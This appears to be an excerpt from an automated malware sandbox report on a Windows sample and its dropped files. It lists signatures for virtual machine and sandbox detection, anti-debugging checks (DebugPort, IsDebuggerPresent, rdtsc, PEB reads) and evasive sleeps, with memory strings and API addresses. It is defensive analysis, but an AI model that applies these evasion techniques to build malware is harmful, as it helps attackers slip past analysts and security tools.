Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: XVM5nluelx.exe, 00000000.00000002.2068735745.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, dejcbcc, 00000004.00000002.2342440036.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: dejcbcc, 00000029.00000002.3254548800.0000000002F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKM.

Contains capabilities to detect virtual machines

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_02FC871C rdtsc

8_2_02FC871C

Contains functionality to query network adapater information

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		9_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		14_2_0040E670

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 477	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2018	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 764	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 738	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 741	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 448
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 425

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

API coverage: 4.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 2888	Thread sleep time: -201800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5520	Thread sleep time: -76400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4676	Thread sleep time: -31300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5396	Thread sleep time: -34000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\dejcbcc	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	14_2_0040FB98

Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000009
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}wC.exe=
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000b
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422986001.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000797000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 33A3.exe, 00000009.00000002.2422986001.0000000000888000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\|
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}W)
Source: explorer.exe, 0000001E.00000003.3052777577.0000000007BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@N
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9507e
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\msmouse.inf_loc
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047730753.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22658-3\

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\XVM5nluelx.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\XVM5nluelx.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	System information queried: CodeIntegrityInformation

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_02FC871C rdtsc

8_2_02FC871C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00424168 _memset,IsDebuggerPresent,

9_2_00424168

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h]	0_2_02E20D90
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h]	0_2_02E2092B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED1D00 push dword ptr fs:[00000030h]	0_2_02ED1D00
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h]	4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h]	4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E91670 push dword ptr fs:[00000030h]	4_2_02E91670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_02FC70A3 push dword ptr fs:[00000030h]	8_2_02FC70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A00042 push dword ptr fs:[00000030h]	8_2_04A00042
